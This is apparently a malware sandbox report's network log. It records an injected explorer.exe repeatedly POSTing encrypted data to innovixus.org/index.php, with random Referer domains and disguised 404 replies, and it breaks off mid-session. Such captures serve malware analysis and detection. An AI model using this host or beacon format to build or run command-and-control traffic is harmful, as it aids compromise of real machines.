                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              106192.168.11.2049860150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:10.884380102 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://tepvodbhlwup.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:10.884380102 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:11.143487930 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:11 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              107192.168.11.2049861150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:11.342549086 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://xcybxqwxluwq.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:11.342550039 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:11.601583958 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:11 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              108192.168.11.2049862150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:11.972929955 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://qvhsioxiikotkl.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:11.972929955 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:12.232306957 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:12 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              109192.168.11.2049863150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:12.432168961 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://dhsmvnsuurcyn.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:12.432168961 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:12.683456898 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:12 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              110192.168.11.2049864150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:12.884582043 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pmjpfqotxotmbddv.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:12.884582043 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:13.144932985 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:13 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              111192.168.11.2049865150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:13.345937014 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://urwyuciltkdhcrp.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:13.345937014 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:13.601177931 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:13 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              112192.168.11.2049866150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:13.810843945 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://beuunuyvdfkjm.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:13.810843945 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:14.069468021 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:13 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              113192.168.11.2049867150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:14.270554066 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://aiadqdettownyftd.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:14.270554066 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:14.527519941 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:14 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              114192.168.11.2049868150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:14.729640961 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://bjcocegfbpr.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:14.729640961 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:14.989159107 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:14 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              115192.168.11.2049869150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:15.190052032 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://afilhsdrrimjuf.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:15.190052032 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:15.445862055 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              116192.168.11.2049870150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:15.646194935 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pjjmrpdaygm.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:15.646194935 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:15.903321981 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              117192.168.11.2049871150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:16.106142998 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://dlkwwmewnyp.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:16.106142998 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:16.364360094 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:16 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              118192.168.11.2049872150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:16.570566893 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://afggwevoauootp.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:16.570566893 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:16.917460918 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:16 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              119192.168.11.2049873150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:17.119524002 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fapvidniufnwqf.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:17.119524002 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:17.375394106 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:17 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              120192.168.11.2049874150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:17.575769901 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://omctdhrtdsygtg.com/
